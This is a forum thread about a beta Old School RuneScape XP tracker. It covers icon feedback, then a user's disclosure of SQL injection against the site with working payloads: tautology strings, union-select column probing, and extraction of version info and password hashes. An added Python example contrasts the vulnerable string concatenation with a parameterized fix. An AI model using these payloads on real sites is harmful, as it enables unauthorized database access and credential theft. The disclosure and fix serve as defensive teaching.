
OSRS xp tracking website


pankijs


Looks alright and I wish you the best of luck, but Foot's website (http://crystalmathlabs.com/tracker/) looks to be able to do everything your tracker does and more, so personally I'll stick to using that.

 

It doesn't mean there's no place for your site however; for the EOC I used both Runetrack and Runetracker, but for now your site doesn't have anything really that'll make me want to visit your site over what's already available.


thanks for feedback :)

My site is still in beta. Like, I'm open to fresh ideas and willing to make them, just name what you want to see, sigs, races, just name it. :)


On a design note, why does it use the updated live game skill icons? :/

 

I didn't like the Old School icons, and they are very small. Also, they didn't fit in the design as well as the new ones.


Looking good, but even though I prefer the updated, live game skill icons over the Old School ones, I think that the Old School icons would be better in this case, because it's a tracker for Old School; it would make more sense to have graphics from Old School.


Surely we can get someone to manually fix them?

 

Although it's quite funny that the two current live game trackers use the old school skill icons, while your Old School tracker uses the live game skill icons.


Well, out of some spare time, here is the set of Old School icons, as a sprite - vertically centred and on a 35px horizontal grid, on a transparent background. For anyone who ever may have need for them!

 

ifc7V0G.png

 

E: this version is better, a few pixels were on vacation in the last version..

 

E2: Forgot overall. shj0gnl.png


Thanks a lot for this. I really learned a lot of SQL injection from using this website.

 

"View your prog" injection:

The following shows all data points in your database in a single choppy graph

alkan' or '1'='1

 

Combines the graph of alkan and leyatis in one!

alkan' or Name='leyatis

 

"Goals" search injection:

Shows all goals in the search list

' or '1'='1

' union select * from goals where '1'='1

 

After the query above, I started doing

' union select all 1,2,'a <FAIL

then

' union select all 1,2,3,'a <FAIL

then

' union select all 1,2,3,4,'a <FAIL

until finally this worked

' union select all 1,2,3,4,5,6,7,'a <WIN

Since it displayed 2 and 3 on the website, all I had to do is substitute the 2 or 3 with something like user(),@@version, or database(), and I could extract anything I wanted from your database. I even obtained 3 database usernames and password hashes. The password to root@localhost starts with "ca". I really suggest filtering your input a bit more to avoid more of this.

oh dear..


oh sh1t.

thanks man, you helped a lot, I completely forgot to escape MySQL strings.

beginner's mistakes.

 

fixed now though.


Not a problem. I had a lot of fun.

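The bug and its fix as discussed in this thread, shown as an added example that is not part of the original posts or the tracker's own code. It uses Python's sqlite3 in place of the site's MySQL and bound parameters rather than the string escaping mentioned above; the `datapoints` table, its rows and the name allow-list are assumptions, and only the `Name` column and the two input strings come from the thread.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; table name and the xp column are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE datapoints (Name TEXT, xp INTEGER)")
    db.executemany(
        "INSERT INTO datapoints VALUES (?, ?)",
        [("alkan", 100), ("alkan", 250), ("leyatis", 900), ("pankijs", 40)],
    )
    return db

def lookup_vulnerable(db, name):
    # 'Before': the input is pasted into the SQL text, so a quote inside
    # `name` closes the string literal and the remainder is parsed as SQL.
    sql = "SELECT Name, xp FROM datapoints WHERE Name = '" + name + "'"
    return db.execute(sql).fetchall()

def lookup_parameterized(db, name):
    # 'After': the statement is fixed and the value is bound separately,
    # so it is only ever compared as data, whatever characters it holds.
    sql = "SELECT Name, xp FROM datapoints WHERE Name = ?"
    return db.execute(sql, (name,)).fetchall()

# Assumed allow-list for player names: letters, digits, space, '_' and '-',
# at most 12 characters. Defence in depth on top of the bound parameter.
NAME_RE = re.compile(r"[A-Za-z0-9 _-]{1,12}")

def lookup_validated(db, name):
    if not NAME_RE.fullmatch(name):
        raise ValueError("invalid player name")
    return lookup_parameterized(db, name)

if __name__ == "__main__":
    db = make_db()
    # The two "View your prog" inputs quoted in the thread, plus a normal name.
    for value in ["alkan", "alkan' or '1'='1", "alkan' or Name='leyatis"]:
        print(
            repr(value),
            "concatenated:", len(lookup_vulnerable(db, value)), "rows;",
            "bound:", len(lookup_parameterized(db, value)), "rows",
        )
```

With the bound parameter the two quoted inputs match no rows, because no player has that literal name; the allow-list rejects them before the query runs at all.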
